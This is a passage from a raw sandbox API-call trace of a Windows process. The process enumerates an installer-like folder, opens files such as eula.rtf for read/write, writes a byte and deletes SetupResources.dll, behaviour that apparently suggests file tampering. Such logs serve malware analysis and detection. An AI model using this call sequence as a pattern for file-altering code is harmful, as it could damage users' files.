(dwErrCode=0xb7) [0061.528] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0061.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0061.529] CloseHandle (hObject=0x420) returned 1 [0061.529] AreFileApisANSI () returned 1 [0061.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0061.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned 46 [0061.529] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll")) returned 1 [0061.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0061.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0061.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0061.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0061.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0061.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a210 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.531] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x2f0, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧蜐\x07̧비聐蘰\x08賂̧")) returned 0 [0061.531] FindClose (in: hFindFile=0x78710 | out: hFindFile=0x78710) returned 1 [0061.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0061.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0061.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0061.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0061.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0061.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0061.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.532] AreFileApisANSI () returned 1 [0061.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1029", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1029", lpUsedDefaultChar=0x0) returned 27 [0061.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.532] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0061.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0061.532] AreFileApisANSI () returned 1 [0061.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.532] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78090 [0061.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x78090, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029") returned 27 [0061.532] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029" (normalized: "c:\\588bce7c90097ed212\\1029"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.532] GetLastError () returned 0x5 [0061.532] GetLastError () returned 0x5 [0061.532] SetLastError (dwErrCode=0x5) [0061.532] GetLastError () returned 0x5 [0061.532] SetLastError (dwErrCode=0x5) [0061.532] GetLastError () returned 0x5 [0061.532] SetLastError (dwErrCode=0x5) [0061.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78090 | out: hHeap=0x20000) returned 1 [0061.533] AreFileApisANSI () returned 1 [0061.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78110 [0061.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x78110, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029") returned 27 [0061.533] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029" (normalized: "c:\\588bce7c90097ed212\\1029"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.533] GetLastError () returned 0x5 [0061.533] GetLastError () returned 0x5 [0061.533] SetLastError (dwErrCode=0x5) [0061.533] GetLastError () returned 0x5 [0061.533] SetLastError (dwErrCode=0x5) [0061.533] GetLastError () returned 0x5 [0061.533] SetLastError (dwErrCode=0x5) [0061.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78110 | out: hHeap=0x20000) returned 1 [0061.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0061.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0061.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0061.533] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="1030", cAlternateFileName="")) returned 1 [0061.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.534] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78090 [0061.534] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.534] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0061.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71758 [0061.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0061.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0061.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0061.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.535] AreFileApisANSI () returned 1 [0061.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1029\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.535] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.536] AreFileApisANSI () returned 1 [0061.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 36 [0061.536] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.536] GetFileType (hFile=0x420) returned 0x1 [0061.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.536] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0061.537] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0061.537] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0061.537] CloseHandle (hObject=0x420) returned 1 [0061.537] AreFileApisANSI () returned 1 [0061.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0061.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 36 [0061.537] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.537] GetFileType (hFile=0x420) returned 0x1 [0061.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0061.537] CloseHandle (hObject=0x420) returned 1 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.538] AreFileApisANSI () returned 1 [0061.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\eula.rtf") returned 36 [0061.538] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe8e)) returned 1 [0061.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.539] AreFileApisANSI () returned 1 [0061.539] 